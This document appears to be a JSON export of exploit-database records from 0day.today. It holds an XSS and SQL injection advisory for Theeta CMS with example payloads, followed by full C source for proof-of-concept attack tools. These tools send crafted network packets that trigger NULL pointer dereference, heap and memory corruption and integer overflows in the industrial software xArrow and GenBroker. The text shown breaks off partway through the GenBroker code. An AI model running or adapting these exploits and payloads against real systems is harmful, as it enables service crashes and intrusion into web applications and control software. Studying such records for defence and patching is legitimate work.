{"id": "1337DAY-ID-10066", "bulletinFamily": "exploit", "title": "Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2009-12-03T00:00:00", "modified": "2009-12-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/10066", "reporter": "c0dy", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-06T21:09:25", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T00:06:34", "value": 6.8}}, "hash": "a6d5c868b304c146b803b3bf8314c987310c64f6eb2a8b0a8f59f2aa669a8919", "hashmap": [{"hash": "b7332ca0a4daabff482fed993517061d", "key": "published"}, {"hash": "ffda1ed9028fd45412f719bf4da278dd", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8d9111cdccf9db245fc9a73cf127ad2c", "key": "title"}, {"hash": "663e28783fb793d51d039a60f489874d", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b7332ca0a4daabff482fed993517061d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5619c5d430a99106d96a7042b106f3bf", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bd44126fe9659befbca888d3d5b87fcb", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/10066", "id": "1337DAY-ID-10066", "lastseen": "2016-04-20T00:06:34", "modified": "2009-12-03T00:00:00", "objectVersion": "1.0", "published": "2009-12-03T00:00:00", "references": [], "reporter": "c0dy", "sourceData": "========================================================================\r\nTheeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities\r\n========================================================================\r\n\r\n##################################################################\r\n#\r\n# [1]-Cross Site Scripting\r\n#\r\n# Vulnerability Description:\r\n# Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web\r\napplications which allow code #injection by malicious web users into the web pages viewed by other users.\r\n#\r\n# Affected items:\r\n# http://server/community/thread.php?start=[XSS]\r\n# http://server/community/thread.php?forum=[XSS]\r\n# http://server/community/thread.php?cat=[XSS]\r\n# http://server/community/forum.php?start=[XSS]\r\n# http://server/community/forum.php?cat=[XSS]\r\n# http://server/blog/index.php?start=[XSS]\r\n#\r\n#\r\n# Exemple: <script>alert(document.cookie)</script> \r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies.\r\n#\r\n# Fix the vulnerability:\r\n# * Encode output based on input parameters.\r\n# * Filter input parameters for special characters.\r\n# * Filter output based on input parameters for special characters...\r\n#\r\n#################################################################\r\n#\r\n# [2]-SQL injection\r\n#\r\n# Vulnerability Description:\r\n# SQL injection is a code injection technique that exploits a security vulnerability occurring in the\r\ndatabase layer of an #application. The vulnerability is present when user input is either incorrectly filtered for\r\nstring literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby\r\nunexpectedly executed.\r\n#\r\n# Affected items:\r\n# http://server/community/forum.php?start=[SQL Injection]\r\n# http://server/community/thread.php?start=[SQL Injection]\r\n# http://server/blog/index.php?start=[SQL Injection]\r\n#\r\n# Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an\r\nerror.)]\r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the\r\ndatabase.\r\n#\r\n# Fix the vulnerability:\r\n# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead,\r\nparameterized statements must be used #(preferred), or user input must be carefully escaped or filtered.\r\n#\r\n#################################################################\r\n#################################################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/10066", "title": "Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities", "type": "zdt", "viewCount": 1}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:06:34"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "0976f07cee4625a54be92612ee4578a6"}, {"key": "modified", "hash": "b7332ca0a4daabff482fed993517061d"}, {"key": "published", "hash": "b7332ca0a4daabff482fed993517061d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ffda1ed9028fd45412f719bf4da278dd"}, {"key": "sourceData", "hash": "5e45460fa3762126310cacff96cee319"}, {"key": "sourceHref", "hash": "833068cf4f1363755f867be9a2c0f98f"}, {"key": "title", "hash": "8d9111cdccf9db245fc9a73cf127ad2c"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "62c9c00a5508c4f1c95771d74ab25bd181dd0670915571d6c4e1295b04897c4d", "viewCount": 1, "enchantments": {"vulnersScore": 8.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/10066", "sourceData": "========================================================================\r\nTheeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities\r\n========================================================================\r\n\r\n##################################################################\r\n#\r\n# [1]-Cross Site Scripting\r\n#\r\n# Vulnerability Description:\r\n# Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web\r\napplications which allow code #injection by malicious web users into the web pages viewed by other users.\r\n#\r\n# Affected items:\r\n# http://server/community/thread.php?start=[XSS]\r\n# http://server/community/thread.php?forum=[XSS]\r\n# http://server/community/thread.php?cat=[XSS]\r\n# http://server/community/forum.php?start=[XSS]\r\n# http://server/community/forum.php?cat=[XSS]\r\n# http://server/blog/index.php?start=[XSS]\r\n#\r\n#\r\n# Exemple: <script>alert(document.cookie)</script> \r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies.\r\n#\r\n# Fix the vulnerability:\r\n# * Encode output based on input parameters.\r\n# * Filter input parameters for special characters.\r\n# * Filter output based on input parameters for special characters...\r\n#\r\n#################################################################\r\n#\r\n# [2]-SQL injection\r\n#\r\n# Vulnerability Description:\r\n# SQL injection is a code injection technique that exploits a security vulnerability occurring in the\r\ndatabase layer of an #application. The vulnerability is present when user input is either incorrectly filtered for\r\nstring literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby\r\nunexpectedly executed.\r\n#\r\n# Affected items:\r\n# http://server/community/forum.php?start=[SQL Injection]\r\n# http://server/community/thread.php?start=[SQL Injection]\r\n# http://server/blog/index.php?start=[SQL Injection]\r\n#\r\n# Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an\r\nerror.)]\r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the\r\ndatabase.\r\n#\r\n# Fix the vulnerability:\r\n# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead,\r\nparameterized statements must be used #(preferred), or user input must be carefully escaped or filtered.\r\n#\r\n#################################################################\r\n#################################################################\r\n\r\n\r\n\n# 0day.today [2018-03-06] #"}

{"result": {"zdt": [{"lastseen": "2018-01-04T17:10:36", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "xArrow <= 3.2 multiple vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-04T17:10:36", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18884", "href": "https://0day.today/exploit/description/18884", "sourceData": "-------------\r\n winerr.h\r\n-------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-------------\r\n xarrow_1.c\r\n-------------\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 8192 // max for recvfrom\r\n#define MAXZIPLEN(n)((n)+(((n)/1000)+1)+12)\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer);\r\nint xarrow_send_header(int sd, u32 zsize, u32 size);\r\nint xarrow_send(int sd, u8 *buff, u32 size);\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz);\r\nint tcp_recv(int sd, u8 *buff, int len);\r\nint putmm(u8 *data, u8 *mem, int len);\r\nint putcc(u8 *data, int chr, int len);\r\nint getxx(u8 *data, u32 *ret, int bits);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n len;\r\n u16 port = 1975;\r\n u8 *buff,\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"xArrow <= 3.2 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \"1 = decompression NULL pointer\\n\"\r\n \"2 = heap corruption\\n\"\r\n \"3 = invalid read access (udp port %d)\\n\"\r\n \"4 = memory corruption (udp port %d)\\n\"\r\n \"\\n\", argv[0], port,\r\n port - 1,\r\n port - 1);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n if(bug == 1) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n if(xarrow_send_header(sd, -1, 100) < 0) goto quit;\r\n\r\n p = buff;\r\n p += putcc(p, 'a', 100);\r\n if(send(sd, buff, p - buff, 0) < 0) goto quit;\r\n\r\n } else if(bug == 2) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n for(i = 0; i < 200; i++) {\r\n if(xarrow_send(sd, NULL, 0) < 0) goto quit;\r\n }\r\n\r\n } else if(bug == 3) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n p = buff;\r\n p += putxx(p, 0xffffffff, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0xfffd, 16); // ((num << 4) + 0x20) & 0xffff\r\n p += putcc(p, 0, 64);\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else if(bug == 4) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n // all fields set to zero because they are not necessary\r\n p = buff;\r\n p += putxx(p, 0, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0, 16);\r\n p += putcc(p, 0, BUFFSZ - (p - buff));\r\n putxx(buff, (p - buff) - 0x16, 32); // correct size\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n for(;;) {\r\n len = xarrow_recv(sd, buff, BUFFSZ);\r\n if(len < 0) goto quit;\r\n }\r\n\r\nquit:\r\n printf(\"- done\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n if(type == IPPROTO_TCP) {\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n printf(\"- connected\\n\");\r\n } else {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n }\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint xarrow_send_header(int sd, u32 zsize, u32 size) {\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n *p++ = 0xeb;\r\n *p++ = 0x90;\r\n }\r\n p += putxx(p, zsize, 32);\r\n p += putxx(p, size, 32);\r\n p += putxx(p, 0xeb90d709, 32);\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x50 ^ 0x65 ^ 0x69; // yeah 0x5c\r\n }\r\n if(send(sd, header, sizeof(header), 0) != sizeof(header)) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_send(int sd, u8 *buff, u32 size) {\r\n static u8 *zbuff = NULL;\r\n uLongf zsize;\r\n\r\n zsize = MAXZIPLEN(size);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n //if(!buff || !size) // compress it anyway!\r\n if(compress2(zbuff, &zsize, buff, size, 9) != Z_OK) return(-1);\r\n if(xarrow_send_header(sd, zsize, size) < 0) return(-1);\r\n if(send(sd, zbuff, zsize, 0) != zsize) return(-1);\r\n printf(\"- %u -> %u bytes sent\\n\", size, (u32)zsize);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz) {\r\n static u8 *zbuff = NULL;\r\n uLongf tmp;\r\n u32 zsize,\r\n size,\r\n type;\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n if(tcp_recv(sd, header, sizeof(header)) < 0) return(-1);\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n if(*p != 0xeb) return(-2); p++;\r\n if(*p != 0x90) return(-3); p++;\r\n }\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x5c;\r\n }\r\n p += getxx(p, &zsize, 32);\r\n p += getxx(p, &size, 32);\r\n p += getxx(p, &type, 32);\r\n if(type == 0xeb90d709) {\r\n if(zsize > buffsz) return(-4);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n if(tcp_recv(sd, zbuff, zsize) < 0) return(-5);\r\n tmp = size;\r\n if(uncompress(buff, &tmp, zbuff, zsize) != Z_OK) return(-6);\r\n } else { // in reality here it gets just rejected\r\n if(size > buffsz) return(-4);\r\n if(tcp_recv(sd, buff, size) < 0) return(-5);\r\n }\r\n printf(\"- %u -> %u bytes received\\n\", zsize, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int len) {\r\n int t;\r\n u8 *p;\r\n\r\n for(p = buff; len; p += t, len -= t) {\r\n if(timeout(sd, 5) < 0) return(-1);\r\n t = recv(sd, p, len, 0);\r\n if(t <= 0) return(-1);\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *mem, int len) {\r\n if(len < 0) len = strlen(mem) + 1;\r\n memcpy(data, mem, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int len) {\r\n memset(data, chr, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint getxx(u8 *data, u32 *ret, int bits) {\r\n u32 num;\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(num = i = 0; i < bytes; i++) {\r\n num |= (data[i] << (i << 3));\r\n }\r\n *ret = num;\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n }\r\n host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18884"}, {"lastseen": "2018-01-05T03:05:45", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "GenBroker <= 9.21.201.01 multiple integer overflows", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T03:05:45", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "value": 3.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18889", "href": "https://0day.today/exploit/description/18889", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n-------------\r\ngenesis_iof.c\r\n-------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple integer overflows \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x89a;\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x2000, 16);\r\n p += putxx(p, 0x20000001, 32);\r\n p += putxx(p, 0, 32);\r\n break;\r\n }\r\n case 2: {\r\n type = 0x453;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 16);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 